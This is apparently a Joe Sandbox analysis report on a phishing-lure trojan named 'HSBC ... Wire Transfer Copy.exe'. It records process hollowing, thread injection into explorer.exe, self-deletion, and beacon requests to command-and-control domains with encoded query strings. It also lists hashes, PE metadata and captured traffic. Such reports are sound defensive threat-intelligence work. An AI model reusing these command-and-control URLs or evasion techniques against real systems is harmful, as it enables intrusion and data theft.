          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 528773 Sample: HSBC ... Wire Transfer Copy.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 7 other signatures 2->45 10 HSBC ... Wire Transfer Copy.exe 3 2->10         started        process3 file4 27 C:\...\HSBC ... Wire Transfer Copy.exe.log, ASCII 10->27 dropped 13 HSBC ... Wire Transfer Copy.exe 10->13         started        process5 signatures6 55 Modifies the context of a thread in another process (thread injection) 13->55 57 Maps a DLL or memory area into another process 13->57 59 Sample uses process hollowing technique 13->59 61 Queues an APC in another process (thread injection) 13->61 16 explorer.exe 13->16 injected process7 dnsIp8 29 www.piramsgprodiet.store 16->29 31 www.gramaltinrafineri.com 16->31 33 4 other IPs or domains 16->33 35 System process connects to network (likely due to code injection or exploit) 16->35 37 Uses ipconfig to lookup or modify the Windows network settings 16->37 20 ipconfig.exe 16->20         started        signatures9 process10 signatures11 47 Self deletion via cmd delete 20->47 49 Modifies the context of a thread in another process (thread injection) 20->49 51 Maps a DLL or memory area into another process 20->51 53 Tries to detect virtualization through RDTSC time measurements 20->53 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          HSBC ... Wire Transfer Copy.exe17%VirustotalBrowse
          HSBC ... Wire Transfer Copy.exe40%ReversingLabsWin32.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          gramaltinrafineri.com0%VirustotalBrowse
          catproductreviews.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.gramaltinrafineri.com/m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo0%Avira URL Cloudsafe
          www.atlantiscompania.com/m4n8/0%Avira URL Cloudsafe
          http://www.catproductreviews.com/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb60%Avira URL Cloudsafe
          https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ghs.google.com
          		172.217.168.83
          		truefalse
            		high
            gramaltinrafineri.com
            		34.102.136.180
            		truefalseunknown
            catproductreviews.com
            		34.102.136.180
            		truefalseunknown
            www.catproductreviews.com
            		unknown
            		unknowntrue
              		unknown
              www.piramsgprodiet.store
              		unknown
              		unknowntrue
                		unknown
                www.gramaltinrafineri.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.gramaltinrafineri.com/m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPofalse
                  • Avira URL Cloud: safe
                  		unknown
                  www.atlantiscompania.com/m4n8/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.catproductreviews.com/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpfalse
                    		high
                    https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    34.102.136.180
                    		gramaltinrafineri.comUnited States
                    		15169GOOGLEUSfalse
                    172.217.168.83
                    		ghs.google.comUnited States
                    		15169GOOGLEUSfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528773
                    Start date:25.11.2021
                    Start time:18:55:52
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:HSBC ... Wire Transfer Copy.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:29
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@7/1@3/2
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 20.1% (good quality ratio 18.2%)
                    • Quality average: 73.7%
                    • Quality standard deviation: 31%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    18:56:46API Interceptor21x Sleep call for process: HSBC ... Wire Transfer Copy.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC ... Wire Transfer Copy.exe.log
                    Process:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):2239
                    Entropy (8bit):5.354287817410997
                    Encrypted:false
                    SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                    MD5:913D1EEA179415C6D08FB255AE42B99D
                    SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                    SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                    SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                    Malicious:true
                    Reputation:moderate, very likely benign file
                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.856337226634709
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:HSBC ... Wire Transfer Copy.exe
                    File size:471552
                    MD5:99b154970d15748d1df9025f675ecc76
                    SHA1:75503611daf18643a401c2020ae9e045111b7f1f
                    SHA256:13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
                    SHA512:9fd769b3292753089bf5e7a1bd805867cc80e670ad43b371cad39acd9124813ab17d7ca6a58211f40e295183ed0eafd22b8a6c4e271f30bf5a500bdfd7376786
                    SSDEEP:12288:6afBLr0oixBFmHFMrvCayGyIgA8flRFPpjxWkSHZ3t7fNv2RkY:Hf9r0oi15rPgqbHj7hyp
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.a..............0..(...........F... ...`....@.. ....................................@................................

                    File Icon

                    Icon Hash:00828e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x474616
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x619F4B56 [Thu Nov 25 08:37:42 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:v4.0.30319
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [ebp+0800000Eh], ch
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x745c40x4f.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x5cc.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x780000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000x7262c0x72800False0.890049297216data7.86790735928IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rsrc0x760000x5cc0x600False0.431640625data4.1545049772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x780000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_VERSION0x760900x33cdata
                    RT_MANIFEST0x763dc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                    Imports

                    DLLImport
                    mscoree.dll_CorExeMain

                    Version Infos

                    DescriptionData
                    Translation0x0000 0x04b0
                    LegalCopyrightCopyright Rogers Peet
                    Assembly Version8.0.6.0
                    InternalNameISectionEnt.exe
                    FileVersion5.6.0.0
                    CompanyNameRogers Peet
                    LegalTrademarks
                    Comments
                    ProductNameBiblan
                    ProductVersion5.6.0.0
                    FileDescriptionBiblan
                    OriginalFilenameISectionEnt.exe

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    11/25/21-18:58:23.381848TCP1201ATTACK-RESPONSES 403 Forbidden804980834.102.136.180192.168.2.3
                    11/25/21-18:58:43.848526TCP1201ATTACK-RESPONSES 403 Forbidden804980934.102.136.180192.168.2.3

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 25, 2021 18:58:02.386955023 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:02.402736902 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.402899981 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:02.403076887 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:02.418643951 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.562637091 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.562691927 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.562720060 CET8049784172.217.168.83192.168.2.3
                    Nov 25, 2021 18:58:02.562838078 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:02.562891006 CET4978480192.168.2.3172.217.168.83
                    Nov 25, 2021 18:58:23.180499077 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.199862003 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:23.200016975 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.200145006 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.219475985 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:23.381848097 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:23.381875992 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:23.382029057 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.382067919 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.691744089 CET4980880192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:23.713184118 CET804980834.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.647877932 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.667702913 CET804980934.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.667838097 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.668176889 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.687668085 CET804980934.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.848526001 CET804980934.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.848567009 CET804980934.102.136.180192.168.2.3
                    Nov 25, 2021 18:58:43.848810911 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.849003077 CET4980980192.168.2.334.102.136.180
                    Nov 25, 2021 18:58:43.870589972 CET804980934.102.136.180192.168.2.3

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 25, 2021 18:58:02.291693926 CET5213053192.168.2.38.8.8.8
                    Nov 25, 2021 18:58:02.361125946 CET53521308.8.8.8192.168.2.3
                    Nov 25, 2021 18:58:23.095354080 CET5623653192.168.2.38.8.8.8
                    Nov 25, 2021 18:58:23.179235935 CET53562368.8.8.8192.168.2.3
                    Nov 25, 2021 18:58:43.582144022 CET5652753192.168.2.38.8.8.8
                    Nov 25, 2021 18:58:43.645256042 CET53565278.8.8.8192.168.2.3

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Nov 25, 2021 18:58:02.291693926 CET192.168.2.38.8.8.80xd3feStandard query (0)www.piramsgprodiet.storeA (IP address)IN (0x0001)
                    Nov 25, 2021 18:58:23.095354080 CET192.168.2.38.8.8.80x7208Standard query (0)www.gramaltinrafineri.comA (IP address)IN (0x0001)
                    Nov 25, 2021 18:58:43.582144022 CET192.168.2.38.8.8.80x81d2Standard query (0)www.catproductreviews.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Nov 25, 2021 18:58:02.361125946 CET8.8.8.8192.168.2.30xd3feNo error (0)www.piramsgprodiet.storeghs.google.comCNAME (Canonical name)IN (0x0001)
                    Nov 25, 2021 18:58:02.361125946 CET8.8.8.8192.168.2.30xd3feNo error (0)ghs.google.com172.217.168.83A (IP address)IN (0x0001)
                    Nov 25, 2021 18:58:23.179235935 CET8.8.8.8192.168.2.30x7208No error (0)www.gramaltinrafineri.comgramaltinrafineri.comCNAME (Canonical name)IN (0x0001)
                    Nov 25, 2021 18:58:23.179235935 CET8.8.8.8192.168.2.30x7208No error (0)gramaltinrafineri.com34.102.136.180A (IP address)IN (0x0001)
                    Nov 25, 2021 18:58:43.645256042 CET8.8.8.8192.168.2.30x81d2No error (0)www.catproductreviews.comcatproductreviews.comCNAME (Canonical name)IN (0x0001)
                    Nov 25, 2021 18:58:43.645256042 CET8.8.8.8192.168.2.30x81d2No error (0)catproductreviews.com34.102.136.180A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.piramsgprodiet.store
                    • www.gramaltinrafineri.com
                    • www.catproductreviews.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.349784172.217.168.8380C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 25, 2021 18:58:02.403076887 CET8201OUTGET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1
                    Host: www.piramsgprodiet.store
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Nov 25, 2021 18:58:02.562637091 CET8202INHTTP/1.1 301 Moved Permanently
                    Location: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+
                    Content-Type: text/html; charset=UTF-8
                    Date: Thu, 25 Nov 2021 17:58:02 GMT
                    Expires: Thu, 25 Nov 2021 17:58:02 GMT
                    Cache-Control: private, max-age=0
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    Content-Security-Policy: frame-ancestors 'self'
                    X-XSS-Protection: 1; mode=block
                    Server: GSE
                    Accept-Ranges: none
                    Vary: Accept-Encoding
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 31 34 30 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 69 72 61 6d 73 67 70 72 6f 64 69 65 74 2e 73 74 6f 72 65 2f 6d 34 6e 38 2f 3f 6c 30 47 3d 2d 5a 72 64 39 4a 31 70 71 48 4c 64 48 50 6f 26 61 6d 70 3b 35 6a 62 6c 43 46 3d 74 55 72 64 33 37 49 48 4e 77 55 4e 72 4b 79 31 42 41 35 51 52 36 45 55 59 47 36 42 4e 48 79 41 61 59 59 6b 70 55 46 71 6f 50 6c 7a 4b 54 38 77 76 76 78 50 32 2f 41 51 76 37 66 53 69 46 43 39 4b 53 4c 2b 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                    Data Ascii: 140<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Permanently</H1>The document has moved <A HREF="https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+">here</A>.</BODY></HTML>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.34980834.102.136.18080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 25, 2021 18:58:23.200145006 CET8263OUTGET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1
                    Host: www.gramaltinrafineri.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Nov 25, 2021 18:58:23.381848097 CET8264INHTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Thu, 25 Nov 2021 17:58:23 GMT
                    Content-Type: text/html
                    Content-Length: 275
                    ETag: "61973ffe-113"
                    Via: 1.1 google
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.34980934.102.136.18080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 25, 2021 18:58:43.668176889 CET8265OUTGET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1
                    Host: www.catproductreviews.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Nov 25, 2021 18:58:43.848526001 CET8266INHTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Thu, 25 Nov 2021 17:58:43 GMT
                    Content-Type: text/html
                    Content-Length: 275
                    ETag: "61973ffe-113"
                    Via: 1.1 google
